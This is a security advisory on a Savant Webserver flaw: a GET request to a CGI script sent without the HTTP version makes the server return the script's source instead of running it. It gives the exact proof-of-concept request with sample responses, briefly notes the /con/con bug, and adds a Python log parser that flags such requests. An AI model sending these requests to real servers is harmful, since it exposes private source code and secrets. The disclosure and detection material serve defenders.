Vulnerability
Savant Webserver
Affected
Savant Webserver
Description
The following is based on MDMA Advisory #5 by Andrew Lewis, a.k.a.
Wizdumb. It is possible to view the source of CGI scripts running
under the Savant Webserver by omitting the HTTP version from the
request. For example, if we connect to port 80 of the server and
type "GET /cgi-bin/mdma.bat HTTP/1.0" followed by two enters, the
script is executed and the results are as follows:

    HTTP/1.0 200 OK
    Pragma: no-cache
    Content-type: text/html
    Server: Savant

    phjeeeer

However, if we just type "GET /cgi-bin/mdma.bat" followed by two
enters, the server returns the script source instead of running it:

    @echo off
    rem CGI Script for demonstrating vulnerability
    echo phjeeeer
Savant is also affected by the /con/con bug.
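
For defenders reviewing server logs, the following added example (not part of the MDMA advisory or of Savant) flags requests that omit the HTTP version and target a script path, which is the request shape described above. The Common Log Format layout, the script prefixes and extensions, and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumption: Common Log Format; the page does not describe Savant's log layout.
CLF = re.compile(r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+$')
VERSION = re.compile(r"HTTP/\d+\.\d+")
# Assumption: where scripts live and which extensions the server executes.
SCRIPT_PREFIXES = ("/cgi-bin/",)
SCRIPT_EXTS = (".bat", ".cmd", ".pl", ".cgi")

def parse_request_line(req):
    """Split a request line into (method, uri, version); version is None
    when the client omitted it, as in the second request in the advisory."""
    parts = req.split()
    if len(parts) == 3 and VERSION.fullmatch(parts[2]):
        return parts[0], parts[1], parts[2]
    if len(parts) == 2:
        return parts[0], parts[1], None
    return None  # malformed, not classified here

def is_script_path(uri):
    # Decode %xx and fold case so encoded or mixed-case paths still match.
    path = unquote(uri.split("?", 1)[0]).lower()
    return path.startswith(SCRIPT_PREFIXES) or path.endswith(SCRIPT_EXTS)

def find_versionless_script_requests(lines):
    """Return (host, uri, status) for each version-less request to a script path."""
    hits = []
    for line in lines:
        m = CLF.match(line.strip())
        parsed = parse_request_line(m["req"]) if m else None
        if parsed and parsed[2] is None and is_script_path(parsed[1]):
            hits.append((m["host"], parsed[1], m["status"]))
    return hits

# Constructed sample log lines (documentation addresses, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2000:10:00:00 +0000] "GET /cgi-bin/mdma.bat HTTP/1.0" 200 9',
    '198.51.100.7 - - [01/Jan/2000:10:00:05 +0000] "GET /cgi-bin/mdma.bat" 200 74',
    '192.0.2.10 - - [01/Jan/2000:10:00:09 +0000] "GET /index.html" 200 512',
    '198.51.100.7 - - [01/Jan/2000:10:00:12 +0000] "GET /CGI-BIN/%6Ddma.bat" 200 74',
]

if __name__ == "__main__":
    for host, uri, status in find_versionless_script_requests(SAMPLE_LOG):
        print(f"version-less request to script path: {host} {uri} -> {status}")
```

Version-less requests for static pages are left alone; only those that reach a script path are reported, with the status code kept for triage.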
Solution
The vendor has been contacted and a fix is in the pipeline.